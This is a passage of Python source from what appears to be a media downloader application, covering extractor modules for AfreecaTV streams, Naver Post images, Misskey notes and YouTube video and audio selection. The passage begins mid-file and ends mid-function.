video.ready(self.cw) self.urls.append(video) thumb = BytesIO() downloader.download(video['url_thumb'], buffer=thumb) self.setIcon(thumb) self.title = os.path.splitext(video['name'])[0].replace(':', ':') self.artist = video['artist'] if video['live']: d = {} d['url'] = self.url d['title'] = self.artist d['thumb'] = thumb.getvalue() utils.update_live(d, self.cw) @try_n(4) def _get_stream(url_m3u8, session, referer, cw=None): print_ = get_print(cw) print_(f'_get_stream: {url_m3u8}') try: stream = playlist2stream(url_m3u8, referer=referer, session=session) except Exception as e: print_(print_error(e)) stream = M3u8_stream(url_m3u8, referer=referer, session=session) return stream class Video(File): type = 'afreeca' _live_info = None def get(self): print_ = get_print(self.cw) url, session = self['referer'], self.session if session is None: session = Session() session.purge('afreeca') html = downloader.read_html(url, session=session) if 
"document.location.href='https://login." in html: raise LoginRequired() if len(html) < 2000: alert = re.find(r'''alert\(['"](.+?)['"]\)''', html) if alert: raise LoginRequired(alert) soup = Soup(html) url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'] print_('url_thumb: {}'.format(url_thumb)) vid = re.find('/player/([0-9]+)', url) if vid is None: # live bid = re.find('afreecatv.com/([^/]+)', url, err='no bid') url_api = f'https://st.afreecatv.com/api/get_station_status.php?szBjId={bid}' r = session.post(url_api, headers={'Referer': url}) d = json.loads(r.text) artist = d['DATA']['user_nick'] if self._live_info is not None: self._live_info['title'] = artist url_api = f'https://live.afreecatv.com/afreeca/player_live_api.php?bjid={bid}' #bno = re.find('afreecatv.com/[^/]+/([0-9]+)', url, err='no bno') bno = re.find(r'nBroadNo\s=\s([0-9]+)', html, err='no bno') #6915 r = session.post(url_api, data={'bid': bid, 'bno': bno, 'type': 'aid', 'pwd': '', 'player_type': 'html5', 'stream_type': 'common', 'quality': 'master', 'mode': 'landing', 'from_api': '0'}, headers={'Referer': url}) d = json.loads(r.text) res = d['CHANNEL'].get('RESULT') print_(f'result: {res}') if res == -6: raise LoginRequired() aid = d['CHANNEL']['AID'] data = {} data['title'] = soup.find('meta', {'property': 'og:title'})['content'].strip() data['files'] = [{'file': f'https://pc-web.stream.afreecatv.com/live-stm-16/auth_master_playlist.m3u8?aid={aid}'}] data['writer_nick'] = artist data['live'] = True elif f'{vid}/catch' in url: #6215 url_api = 'https://api.m.afreecatv.com/station/video/a/catchview' r = session.post(url_api, data={'nPageNo': '1', 'nLimit': '10', 'nTitleNo': vid}, headers={'Referer': url}) try: s = cut_pair(r.text) d = json.loads(s) except Exception as e: print_(r.text) raise e data = d['data'][0] else: url_api = 'https://api.m.afreecatv.com/station/video/a/view' r = session.post(url_api, data={'nTitleNo': vid, 'nApiLevel': '10', 'nPlaylistIdx': '0'}, headers={'Referer': url}) try: s = cut_pair(r.text) d = json.loads(s) except Exception as e: print_(r.text) raise e data = d['data'] title = data.get('full_title') or data['title'] artist = data.get('copyright_nickname') or data.get('original_user_nick') or data['writer_nick'] if data.get('adult_status') == 'notLogin': raise LoginRequired(title) urls_m3u8 = [] for file in data['files']: if file.get('quality_info'): file = file['quality_info'][0]['file'] else: file = file['file'] urls_m3u8.append(file) print_(f'urls_m3u8: {len(urls_m3u8)}') if data.get('live'): hdr = session.headers.copy() hdr['Referer'] = url stream = utils.LiveStream(urls_m3u8[0], headers=hdr, cw=self.cw) else: streams = [] for url_m3u8 in urls_m3u8: try: stream = _get_stream(url_m3u8, session, url, cw=self.cw) except Exception as e: print_(print_error(e)) continue #2193 streams.append(stream) for stream in streams[1:]: streams[0] += stream stream = streams[0] live = data.get('live') or False return {'url': stream, 'title': title, 'name': format_filename(title, vid, '.mp4', artist=artist, live=live), 'url_thumb': url_thumb, 'artist': artist, 'live': live} class Live_afreeca(utils.Live): type = 'afreeca' @classmethod def is_live(cls, url): return bool(re.match(r'https?://(play|bj).afreecatv.com/([^/?#]+)', url)) and url.strip('/').count('/') <= 4 @classmethod def fix_url(cls, url): bj = re.find(r'https?://(play|bj).afreecatv.com/([^/?#]+)', url)[1] return f'https://play.afreecatv.com/{bj}' @classmethod def check_live(cls, url, info=None): try: video = Video({'referer': url}) 
video._live_info = info video.ready(None) return True except Exception as e: print(e) return False File: src/extractor/naverpost_downloader.py # coding: UTF-8 # title: Download naver post image # author: SaidBySolo # comment: 네이버 포스트의 이미지를 다운로드합니다 """ MIT License Copyright (c) 2020 SaidBySolo Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import codecs import json import re from distutils.util import strtobool from typing import Any, Iterator, List from urllib.parse import ParseResult, urlparse, parse_qs import requests from bs4 import BeautifulSoup import clf2 import page_selector from utils import Downloader, Soup, clean_title class Page: def __init__(self, title, url) -> None: self.title = clean_title(title) self.url = url class DownloaderNaverPost(Downloader): type = "naverpost" # 타입 URLS = ["m.post.naver.com", "post.naver.com"] def init(self) -> None: self.parsed_url = urlparse(self.url) # url 나눔 self.soup = get_soup(self.url) @property def client(self): return Client(self.parsed_url, self.soup) def read(self): if self.client.single: self.title = self.client.title posts = self.client.posts else: raise NotImplementedError for img_link in img_src_generator(posts): self.urls.append(img_link) # https://github.com/KurtBestor/Hitomi-Downloader/blob/master/src/extractor/manatoki_downloader.py#L106 참고 @page_selector.register("naverpost") def f(url, win): client = Client(urlparse(url), get_soup(url, win=win)) return [ page for page_list in client.posts for page in page_list ] # 2차원 리스트 -> 1차원 리스트 # https://github.com/KurtBestor/Hitomi-Downloader/blob/master/src/extractor/manatoki_downloader.py#L84 참고 def get_soup(url: str, win=None) -> BeautifulSoup: res = clf2.solve(url, win=win) return Soup(res["html"]) # 페이지 파싱에서 사용되는 파서 def page_soup(url: str) -> BeautifulSoup: get_html_regex = re.compile(r"\"html\"\:(.+)(\n|\s)\}") response = requests.get(url) like_html = get_html_regex.search(response.text)[1] html = decode_escapes(like_html).replace(r"\/", "/") return Soup(html) # HTML5 data-* 속성이 사용됨. 
def get_img_data_linkdatas(soup: Any) -> Iterator[str]: a_elements = soup.find_all("a", {"data-linktype": "img"}) # 링크 타입이 img인것만 전부 찾음 for a_element in a_elements: yield a_element["data-linkdata"] def img_src_generator(linkdatas: Iterator[str]) -> Iterator[str]: for linkdata in linkdatas: data = json.loads(linkdata) if data.get("linkUse") is None: yield data["src"] # 제네레이터 else: if not strtobool(data["linkUse"]): yield data["src"] # https://stackoverflow.com/a/24519338 참고 def decode_escapes(like_html: str) -> str: escape_sequence_regex = re.compile( r""" ( \\U........ # 8-digit hex escapes | \\u.... # 4-digit hex escapes | \\x.. # 2-digit hex escapes | \\[0-7]{1,3} # Octal escapes | \\N\{[^}]+\} # Unicode characters by name | \\[\\'"abfnrtv] # Single-character escapes )""", re.UNICODE | re.VERBOSE, ) return escape_sequence_regex.sub( lambda match: codecs.decode(match.group(0)), like_html ) # 제목 class Title: def __init__(self, soup: Any): self.soup = soup def get_profile_title(self) -> str: profile_name = self.soup.find("p", class_="nick_name").find( "span", class_="name" ) # 프로필 닉네임 return clean_title(profile_name.text) # 닉네임으로만 def get_series_title(self) -> str: series_name = self.soup.find("h2", class_="tit_series").find( "span", class_="ell" ) # 시리즈 제목 author = self.soup.find("div", class_="series_author_wrap").find( "strong", class_="ell1" ) # 작성자 return clean_title(f"{series_name.text} ({author.text})") # 무난하게 붙임 def get_title(self) -> str: title = self.soup.find("h3", class_="se_textarea") # 포스트 제목 author = self.soup.find("span", class_="se_author") # 작성자 return clean_title(f"{title.text.replace(' ', '')} ({author.text})") # 무난하게 붙임 # 총 포스트 수 class Total: def __init__(self, soup: Any) -> None: self.soup = soup # 0: 팔로워 1: 팔로잉 2: 포스트 3: 좋아요한글 def get_total_post(self) -> int: profile_info = self.soup.find("div", class_="expert_num_info") # 프로필 정보 total_post_element = profile_info.find_all("li", class_="inner")[2] return int(total_post_element.find("span", class_="num").text) # 총몇개인지만 리턴 # 0: 포스트 1: 팔로워 def get_series_total_post(self) -> int: series_info = self.soup.find("div", class_="series_follow_area") # 시리즈 정보 total_post_element = series_info.find_all("a")[0] return int(total_post_element.find("em").text) # 총몇개인지만 리턴 class UrlGenerator: def __init__(self, parsed_url: ParseResult, total_count: int) -> None: self.parsed_url = parsed_url self.count = ( round(total_count / 20) + 1 if not (total_count / 20).is_integer() else round(total_count / 20) ) def all_post_url_generator(self) -> Iterator[str]: query = parse_qs(self.parsed_url.query) for i in range(self.count): new_url_query = f"?memberNo={query['memberNo'][0]}&fromNo={i + 1}" url = f"https://{self.parsed_url.netloc}/async{self.parsed_url.path}{new_url_query}" yield url def all_series_url_generator(self) -> Iterator[str]: query = parse_qs(self.parsed_url.query) for i in range(self.count): new_url_query = f"?memberNo={query['memberNo'][0]}&seriesNo={query['seriesNo'][0]}&fromNo={i + 1}" url = f"https://{self.parsed_url.netloc}/my/series/detail/more.nhn{new_url_query}" yield url # 여기서 페이지 리스트 만듬 class PostPage: def __init__(self, soup: Any): self.soup = soup def all_post_page_generator(self) -> Iterator[List[Page]]: titles = self.soup.find_all("strong", class_="tit_feed ell") link_elements = self.soup.find_all("a", class_="link_end", href=True) page = [ Page(title.text.replace(" ", ""), link_element["href"]) for link_element, title in zip(link_elements, titles) ] yield page[::-1] def all_series_page_generator(self) -> 
Iterator[List[Page]]: titles = [ element.find("span") for element in self.soup.find_all("div", class_="spot_post_name") ] link_elements = self.soup.find_all("a", class_="spot_post_area", href=True) page = [ Page(title.text.replace(" ", ""), link_element["href"]) for link_element, title in zip(link_elements, titles) ] yield page[::-1] # 필요한 클래스 전부 상속후 편하게 쓸수있게 만듬 class Client(Title, Total, UrlGenerator): def __init__(self, parsed_url: ParseResult, soup: BeautifulSoup): Title.__init__(self, soup) Total.__init__(self, soup) if parsed_url.path.startswith("/viewer"): self.title = self.get_title() self.posts = get_img_data_linkdatas(self.soup) self.single = True elif parsed_url.path.startswith("/my.nhn"): UrlGenerator.__init__(self, parsed_url, self.get_total_post()) self.title = self.get_profile_title() self.posts = self.all_post_url_generator() self.single = False elif parsed_url.path.startswith("/my/series"): UrlGenerator.__init__(self, parsed_url, self.get_series_total_post()) self.title = self.get_series_title() self.posts = self.all_series_url_generator() self.single = False else: raise Exception("유효하지 않습니다.") File: src/extractor/misskey_downloader.py from utils import Downloader, Session, clean_title, get_ext, check_alive, tr_, try_n, File, get_max_range, limits import downloader import ree as re from datetime import datetime import utils import errors DOMAIN = 'misskey.io' SUBFOLDER = True class File_misskey(File): type = 'misskey' format = '[date] id_ppage' def get_file(nid, url, referer, session, p, time): ext = get_ext(url) or downloader.get_ext(url, session, referer) d = { 'date': time, 'id': nid, 'page': p, } filename = utils.format('misskey', d, ext) info = {'name': filename, 'url': url, 'referer': referer} return File_misskey(info) def get_time(note): ds = note['createdAt'] time = datetime.strptime(ds.split('.')[0], '%Y-%m-%dT%H:%M:%S') time = (time-datetime(1970,1,1)).total_seconds() return time class Downloader_misskey(Downloader): type = 'misskey' URLS = [f'{DOMAIN}/notes/', f'{DOMAIN}/@'] display_name = 'Misskey' ACCEPT_COOKIES = [rf'(.*\.)?{DOMAIN}'] MAX_CORE = 8 @classmethod def fix_url(cls, url): if DOMAIN.lower() in url.lower() and '://' not in url: url = 'https://' + url if url.startswith('@'): url = f'https://{DOMAIN}/{url}' return url def init(self): self.session = Session() if f'{DOMAIN}/notes/' in self.url: raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url)) @try_n(4, sleep=5) @limits(2) def call(self, path, payload): token = self.session.cookies.get('token', domain=DOMAIN) url_api = f'https://{DOMAIN}/api/{path}' if token: payload['i'] = token r = self.session.post(url_api, json=payload) d = r.json() if isinstance(d, dict): err = d.get('error') if err: raise errors.Invalid(err['message']) return d def read(self): nid = re.find(rf'{DOMAIN}/notes/([^/]+)', self.url) if nid: self.single = True data = {'noteId':nid, } note = self.call('notes/show', data) username = note['user']['username'] self.artist = note['user']['name'] or username host = note['user']['host'] if host: username += f'@{host}' self.title = f'{clean_title(self.artist)} (misskey_@{username})' time = get_time(note) for file in note['files']: file = get_file(note['id'], file['url'], self.url, self.session, len(self.urls), time) if SUBFOLDER: file['name'] = self.title + '/' + file['name'] self.urls.append(file) else: username = re.find(rf'{DOMAIN}/@([a-zA-Z0-9_@\.]+)', self.url, err='no username') if '@' in username: username, host = username.split('@') else: host = None data = 
{"username":username, "host":host, } d = self.call('users/show', data) username = d['username'] self.artist = d['name'] or username host = d['host'] or None if host: username += f'@{host}' uid = d['id'] self.title = title = f'{clean_title(self.artist)} (misskey_@{username})' untilId = None nids = set() n = get_max_range(self.cw) while check_alive(self.cw): data = {"userId":uid, "limit":30, } if untilId: data["untilId"] = untilId d = self.call('users/notes', data) if not d: break for note in d: nid = note['id'] if nid in nids: continue nids.add(nid) time = get_time(note) url_note = f'https://{DOMAIN}/notes/{nid}' for p, file in enumerate(note['files']): file = get_file(note['id'], file['url'], url_note, self.session, p, time) self.urls.append(file) untilId = nid self.cw.setTitle(f'{tr_("읽는 중...")} {title} - {len(self.urls)}') if len(self.urls) >= n: break self.title = title File: src/extractor/youtube_downloader.py #coding: utf-8 import ytdl import downloader import downloader_v3 from error_printer import print_error from timee import sleep import ree as re from utils import urljoin, Downloader, try_n, get_print, filter_range, compatstr, uuid, get_max_range, format_filename, get_resolution, get_abr, Session, fix_dup, File, clean_title import ffmpeg import constants import os import utils from translator import tr, tr_ from datetime import datetime import threading from putils import DIR import errors MODE = 'query' utils.TOKENS['youtube'] = ['title', 'id', 'artist', 'date'] + utils.ADD_TOKENS def print_streams(streams, cw): print_ = get_print(cw) for stream in streams: print_(f'{"LIVE " if stream.live else ""}[{stream.resolution}][{stream.fps}fps][{stream.abr_str}{"(fixed)" if stream.abr_fixed else ""}][{stream.tbr}] {stream.subtype} [{stream.video_codec} / {stream.audio_codec}] ─ {stream.format}') print_('') class Video(File): type = 'youtube' vcodec = None filename0 = None chapters = None _yt = None _thumb = None @property def yt(self): print_ = get_print(self.cw) if self._yt is None: for try_ in range(4): try: self._yt = ytdl.YouTube(self['referer'], cw=self.cw) break except errors.Retry as e: raise e except Exception as e: e_ = e s = print_error(e) print_('### youtube retry...\n{}'.format(s)) sleep(try_, self.cw) else: raise e_ return self._yt def thumb(self): if self._thumb is None: self.thumb_url, self._thumb = ytdl.download_thumb(self.yt.thumbnail_url, self.cw, self.session) self._thumb.seek(0) return self._thumb def get(self): type = self['type'] only_mp4 = self['only_mp4'] audio_included = self['audio_included'] max_res = self['max_res'] max_abr = self['max_abr'] cw = self.cw session = self.session url = self['referer'] print_ = get_print(cw) print('max_res: {}'.format(max_res)) yt = self.yt if utils.ui_setting.chapterMarkerCheck.isChecked(): self.chapters = yt.info.get('chapters') streams = yt.streams.all() print_streams(streams, cw) #3528 time = datetime.strptime(yt.info['upload_date'], '%Y%m%d') if utils.ui_setting.youtubeMtimeCheck.isChecked(): #6092 self.utime = (time-datetime(1970,1,1)).total_seconds() print_('utime: {}'.format(self.utime)) if type == 'video': streams[:] = [stream for stream in streams if stream.video_codec is not None] # Only mp4 if only_mp4: streams_ = list(streams) streams[:] = [] for stream in streams_: if stream.subtype == 'mp4': streams.append(stream) # Audio included; Non-HD if audio_included: streams_ = list(streams) streams[:] = [] for stream in streams_: if stream.audio_codec is not None: streams.append(stream) # Maximum resolution streams_ = 
list(streams) streams[:] = [] for stream in streams_: if stream.resolution is None: continue res = int(stream.resolution.replace('p','')) if max_res is None or res <= max_res: streams.append(stream) def key(stream): fps = stream.fps vc = stream.video_codec if vc: vc = vc.lower().split('.')[0].lower() if vc == 'av01': vc = 'av1' if vc == 'vp09': vc = 'vp9' try: i = constants.CODECS_PRI.index(vc) except ValueError: i = 999 pr = 'premium' in stream.format.lower() #6350 return not pr, i, -fps, -stream.tbr streams = sorted(streams, key=key) #6079 print_('') elif type == 'audio': streams[:] = [stream for stream in streams if stream.abr] # Maximum abr abrs = [stream.abr for stream in streams] max_abr = min(max(abrs), max_abr) streams_ = list(streams) streams[:] = [] for stream in streams_: if stream.abr is None: continue abr = stream.abr if max_abr is None or abr >= max_abr: streams.append(stream) #''' else: raise Exception('type "{}" is not supported'.format(type)) # Pick the best while streams: if type == 'video': ress = [int_(stream.resolution.replace('p', '')) for stream in streams] m = max(ress) prefer_format = None#'mp4' elif type == 'audio': ress = [stream.abr for stream in streams] m = min(ress) prefer_format = 'webm' print('Resolutions:', ress) stream_final = None for stream, res in zip(streams, ress): if res == m: if type == 'video': foo = (stream_final is not None) and (stream_final.audio_codec is None) and bool(stream.audio_codec) and stream_final.fps <= stream.fps #6911 elif type == 'audio': foo = False if stream_final is None or (foo or (stream_final.subtype.lower()!=prefer_format and stream.subtype.lower()==prefer_format)): #print(foo) print_('# stream_final') print_streams([stream], cw) stream_final = stream ok = downloader.ok_url(stream_final.url, referer=url, session=session) if isinstance(stream_final.url, str) else True if ok: break else: print_('stream is not valid') streams.remove(stream_final) else: if type == 'audio' and max_abr > 0: self['max_abr'] = 0 return self.get(url) # 1776 raise Exception('No videos') stream = stream_final ## if stream.video_codec and stream_final.video_codec.lower().startswith('av'): ## self.vcodec = 'h264' self.id = yt.video_id self.stream = stream self.username = yt.info['uploader'] self.stream_audio = None self.audio = None self.thumb_url = None if type == 'audio' and 'DASH' in self.stream.format: self.stream.setDashType('audio') # Audio if type=='video' and stream.audio_codec is None: print('audio required') streams = [stream for stream in yt.streams.all() if stream.abr] print_streams(streams, cw) # only mp4; https://github.com/KurtBestor/Hitomi-Downloader/issues/480 def isGood(stream): return stream.audio_codec.lower().startswith('mp4') streams_good = [stream for stream in streams if isGood(stream)] if streams_good: streams = streams_good print_streams(streams, cw) # only audio? 
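        # Audio-only candidates are preferred when any exist; the key() defined
        # next then orders them by (language match against constants.ALANG,
        # "original" track flag from format_note, -abr), so the best-matching,
        # highest-bitrate track sorts first. Illustrative sketch of that
        # ordering (helper names here are hypothetical, for explanation only):
        #   streams.sort(key=lambda s: (lang_mismatch(s), not_original(s), -s.abr))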
if any(stream.resolution is None for stream in streams): streams = [stream for stream in streams if stream.resolution is None] print_streams(streams, cw) def key(stream): abr = stream.abr format_note = stream.video.get('format_note') if format_note and 'original' in format_note.lower(): org = 0 else: org = 1 lang = stream.video.get('language') if lang and constants.ALANG: match_full = lang.lower().startswith(constants.ALANG) match_part = lang.lower().startswith(constants.ALANG.split('-')[0]) if match_full or match_part: lang = -1 if match_full else 0 else: lang = 1 else: lang = 1 return lang, org, -abr streams = sorted(streams, key=key) #6332 best_audio = streams[0] print_streams([best_audio], cw) self.stream_audio = best_audio if 'DASH' in self.stream_audio.format: self.stream_audio.setDashType('audio') self.audio = best_audio.url if callable(self.audio): self.audio = self.audio() # _url = self.stream.url if callable(_url): _url = _url() title = yt.title #soup = Soup(yt.watch_html) #title = soup.title.text.replace('- YouTube', '').strip() self.title = title ext = '.' + self.stream.subtype #6425 d = {} v = self.stream.video if type != 'audio': d['width'] = v['width'] d['height'] = v['height'] tokens = ['fps', 'vcodec', 'acodec', 'audio_channels', 'language', 'vbr', 'abr', 'tbr'] for token in tokens: value = v.get(token) if isinstance(value, str): value = clean_title(value) d[token] = value if self.stream_audio: v = self.stream_audio.video for token in tokens: value = v.get(token) if isinstance(value, str): value = clean_title(value) _ = d.get(token) if not _ or _ == 'none': d[token] = value filename = format_filename(title, yt.video_id, ext, artist=yt.info['uploader'], date=None if self.stream.live else time, d=d, live=self.stream.live) #4953, #5529 if cw: filename = fix_dup(filename, cw.downloader.cache_filenames) #6235 print_(f'filename: {filename}') if type == 'audio': self.filename0 = filename filename = f'{uuid()}_audio.tmp' #4776 print_('Resolution: {}'.format(stream.resolution)) print_('Codec: {} / {}'.format(stream.video_codec, stream.audio_codec)) print_('Abr: {}'.format(stream.abr)) print_('Subtype: {}'.format(stream.subtype)) print_('FPS: {}\n'.format(stream.fps)) if self.audio is not None: #5015 def f(audio): print_('Download audio: {}'.format(audio)) path = os.path.join(DIR, f'{uuid()}_a.tmp') if cw is not None: cw.trash_can.append(path) if constants.FAST: downloader_v3.download(audio, session=session, chunk=1024*1024, n_threads=2, outdir=os.path.dirname(path), fileName=os.path.basename(path), customWidget=cw, overwrite=True, mode=MODE) else: downloader.download(audio, session=session, outdir=os.path.dirname(path), fileName=os.path.basename(path), customWidget=cw, overwrite=True) self.audio_path = path print_('audio done') self.thread_audio = threading.Thread(target=f, args=(self.audio,), daemon=True) self.thread_audio.start() return {'url': _url, 'name': filename} def pp(self, filename, i=0): cw = self.cw print_ = get_print(cw) ui_setting = utils.ui_setting ext = os.path.splitext(filename)[1].lower() if not os.path.isfile(filename): print('no file: {}'.format(filename)) return filename_new = filename if self['type'] == 'video' and (self.audio is not None or ext != '.mp4') and not self.stream.live: # UHD or non-mp4 if self.audio is not None: # merge self.thread_audio.join() ext, out = ffmpeg.merge(filename, self.audio_path, cw=cw, vcodec=self.vcodec) #print(out) name, ext_old = os.path.splitext(filename) if ext_old.lower() != ext.lower(): print_('rename ext {} --> 
{}'.format(ext_old, ext)) filename_new = '{}{}'.format(name, ext) if os.path.isfile(filename_new): os.remove(filename_new) os.rename(filename, filename_new) else: # convert non-mp4 video -> mp4 name, ext_old = os.path.splitext(filename) filename_new = '{}.mp4'.format(name) print_('Convert video: {} -> {}'.format(filename, filename_new)) ffmpeg.convert(filename, filename_new, cw=cw) elif self['type'] == 'audio' and ext != '.mp3': # convert non-mp3 audio -> mp3 name, ext_old = os.path.splitext(filename) filename_new = '{}.mp3'.format(name) ffmpeg.convert(filename, filename_new, '-shortest -preset ultrafast -b:a {}k'.format(get_abr()), cw=cw) if self.filename0 and os.path.basename(filename_new) != self.filename0: #4776 filename0 = utils.fix_enumerate(self.filename0, i, cw) filename_old = filename_new ext = '.mp4' if self['type'] == 'video' else '.mp3' filename_new = os.path.join(os.path.dirname(filename_old), os.path.splitext(filename0)[0]+ext) print_(f'rename: {filename_old} -> {filename_new}') if filename_old != filename_new: if not os.path.exists(os.path.dirname(filename_new)): os.makedirs(os.path.dirname(filename_new)) if os.path.isfile(filename_new): os.remove(filename_new) os.rename(filename_old, filename_new) if self['type'] == 'audio' and ui_setting.albumArt.isChecked(): try: ffmpeg.add_cover(filename_new, self.thumb(), {'artist':self.yt.info['uploader'], 'title':self.title}, cw=cw) except Exception as e: s = print_error(e) print_(s) if self.chapters and self['type'] == 'video': #6085 try: chapters = [] for chapter in self.chapters: chapter = ffmpeg.Chapter(chapter['title'], chapter['start_time'], chapter['end_time']) chapters.append(chapter) ffmpeg.add_chapters(filename_new, chapters, cw=cw) except Exception as e: s = print_error(e) print_(s) return filename_new def pp_always(self, filename): cw = self.cw print_ = get_print(cw) if utils.ui_setting.thumbCheck.isChecked(): import filetype s = self.thumb().getvalue() ext = filetype.guess(s) if ext is None: raise Exception('unknown ext') filename_thumb = os.path.splitext(filename)[0] + '.' 
+ ext.extension print_(f'filename_thumb: {filename_thumb}') with open(filename_thumb, 'wb') as f: f.write(s) cw.imgs.append(filename_thumb) cw.dones.add(os.path.abspath(filename_thumb)) if utils.ui_setting.subtitle.isChecked(): self.subs = self.yt.subtitles utils.pp_subtitle(self, filename, cw) return filename def get_id(url): id_ = re.find(r'youtu.be/([0-9A-Za-z-_]{10,})', url) or re.find(r'[?&]v=([0-9A-Za-z-_]{10,})', url) or re.find(r'/(v|embed|shorts|live)/([0-9A-Za-z-_]{10,})', url) or re.find(r'%3Fv%3D([0-9A-Za-z-_]{10,})', url) #5679 if isinstance(id_, tuple): id_ = id_[-1] return id_ class Downloader_youtube(Downloader): type = 'youtube' single = True yt_type = None URLS = ['youtube.co', 'youtu.be', 'yewtu.be'] lock = True display_name = 'YouTube' keep_date = True #3528 __format = {} ACCEPT_COOKIES = [r'.*(youtube|youtu\.be|google).*'] atts = ['cache_filenames'] def init(self): self.cache_filenames = {} format = self.cw.format if format: if isinstance(format, str): ext_result = format elif isinstance(format, dict): ext_result = format['format'] self.__format = format else: raise NotImplementedError(format) else: ext_result = default_option() self.cw.format = ext_result if ext_result in ['mp4', 'mkv', '3gp']: self.yt_type = 'video' else: self.yt_type = 'audio' self.cw.setMusic(True) self.session = Session() @classmethod def fix_url(cls, url): #2033 url = url.replace('yewtu.be', 'youtube.com') if not re.match('https?://.+', url, re.I): url = 'https://www.youtube.com/watch?v={}'.format(url) id_ = get_id(url) if id_: #6485 url = 'https://www.youtube.com/watch?v={}'.format(id_) for header in ['channel', 'user', 'c']: #5365, #5374 tab = re.find(rf'/{header}/[^/]+/?(.+)?', url, re.I) if tab == 'playlists': url = re.sub(rf'(/{header}/[^/]+/?)(.+)?', r'\1', url, flags=re.I) tab = '' if tab in ['', 'featured'] and '/{}/'.format(header) in url.lower(): username = re.find(r'/{}/([^/\?]+)'.format(header), url, re.I) url = urljoin(url, '/{}/{}/videos'.format(header, username)) m = re.find(r'youtube.com/(@[^/]+)/?(.+)?', url, re.I) if m and m[1] in ['', 'featured']: #6129 url = urljoin(url, f'/{m[0]}/videos') return url.strip('/') @classmethod def key_id(cls, url): return get_id(url) or url @classmethod def is_channel_url(cls, url): if '/channel/' in url or '/user/' in url or '/c/' in url: return True if ''.join(url.split('/')[3:4]).startswith('@'): return not url.lower().endswith('/live') return False def read(self): cw = self.cw if self.yt_type == 'video': res = self.__format.get('res', get_resolution()) info = get_videos(self.url, self.session, type=self.yt_type, max_res=res, only_mp4=False, audio_included=not True, cw=cw) else: abr = self.__format.get('abr', get_abr()) info = get_videos(self.url, self.session, type=self.yt_type, max_abr=abr, cw=cw) videos = info['videos'] if not videos: raise Exception('No videos') self.enableSegment(overwrite=True) self.cw.v3['mode'] = MODE # first video must be valid while videos: video = videos[0] try: video.ready(cw) break except Exception as e: e_ = e self.print_(print_error(e)) videos.remove(video) else: raise e_ if info['type'] != 'single': video = self.process_playlist(info['title'], videos) else: self.urls.append(video) self.title = os.path.splitext(video.filename0 or video['name'])[0].replace(':', ':') #4776 if video.stream.live: self.lock = False self.artist = video.username self.setIcon(video.thumb()) if video.stream.live: d = {} d['url'] = self.url d['title'] = self.artist d['thumb'] = video.thumb().getvalue() utils.update_live(d, self.cw) def 
int_(x): try: return int(x) except: return 0 @try_n(2, sleep=1) def get_videos(url, session, type='video', only_mp4=False, audio_included=False, max_res=None, max_abr=None, cw=None): info = {} n = get_max_range(cw) if Downloader.get('youtube').is_channel_url(url): #5445 reverse = utils.SD['youtube']['channel_reverse'] #5848 tab = ''.join(url.split('/')[4:5]) if tab == '': #5901 url = '/'.join(url.split('/')[:4]) + '/videos' info = read_channel(url, n=n, cw=cw, reverse=reverse) info['type'] = 'channel' info['title'] = '[Channel] {}'.format(info['uploader']) if cw: info['urls'] = filter_range(info['urls'], cw.range) cw.fped = True elif '/playlist' in url: info = read_playlist(url, n=n, cw=cw) info['type'] = 'playlist' info['title'] = '[Playlist] {}'.format(info['title']) if cw: info['urls'] = filter_range(info['urls'], cw.range) cw.fped = True elif get_id(url) or url.lower().endswith('/live'): info['type'] = 'single' info['urls'] = [url] else: raise NotImplementedError(url) info['videos'] = [Video({'referer':url, 'type':type, 'only_mp4':only_mp4, 'audio_included':audio_included, 'max_res':max_res, 'max_abr':max_abr}) for url in info['urls']] return info def read_channel(url, n, cw=None, reverse=False): return read_playlist(url, n, cw, reverse=reverse) @try_n(2) def read_playlist(url, n, cw=None, reverse=False): print_ = get_print(cw) options = { 'extract_flat': True, 'playlistend': n, 'writesubtitles': True, } ydl = ytdl.YoutubeDL(options, cw=cw) info = ydl.extract_info(url) es = info['entries'] urls = [] for e in es: href = 'https://www.youtube.com/watch?v={}'.format(e['id']) urls.append(href) if reverse: urls = urls[::-1] info['urls'] = urls if not info.get('uploader'): title = info['title'] if title.lower().endswith(' - videos'): title = title[:-len(' - videos')] info['uploader'] = title print_('⚠️ Fix uploader: None -> {}'.format(title)) return info import selector @selector.register('youtube') def select(): from Qt import Qt, QDialog, QFormLayout, QLabel, QComboBox, QWidget, QVBoxLayout, QDialogButtonBox if utils.ui_setting.askYoutube.isChecked(): win = QDialog(constants.mainWindow) win.setWindowTitle('Youtube format') utils.windows.append(win) layout = QFormLayout(win) youtubeCombo_type = QComboBox() layout.addRow('파일 형식', youtubeCombo_type) for i in range(utils.ui_setting.youtubeCombo_type.count()): youtubeCombo_type.addItem(utils.ui_setting.youtubeCombo_type.itemText(i)) youtubeCombo_type.setItemIcon(i, utils.ui_setting.youtubeCombo_type.itemIcon(i)) youtubeCombo_type.setCurrentIndex(utils.ui_setting.youtubeCombo_type.currentIndex()) youtubeLabel_res = QLabel('해상도') youtubeCombo_res = QComboBox() for i in range(utils.ui_setting.youtubeCombo_res.count()): youtubeCombo_res.addItem(utils.ui_setting.youtubeCombo_res.itemText(i)) youtubeCombo_res.setCurrentIndex(utils.ui_setting.youtubeCombo_res.currentIndex()) youtubeLabel_abr = QLabel('음질') youtubeCombo_abr = QComboBox() for i in range(utils.ui_setting.youtubeCombo_abr.count()): youtubeCombo_abr.addItem(utils.ui_setting.youtubeCombo_abr.itemText(i)) 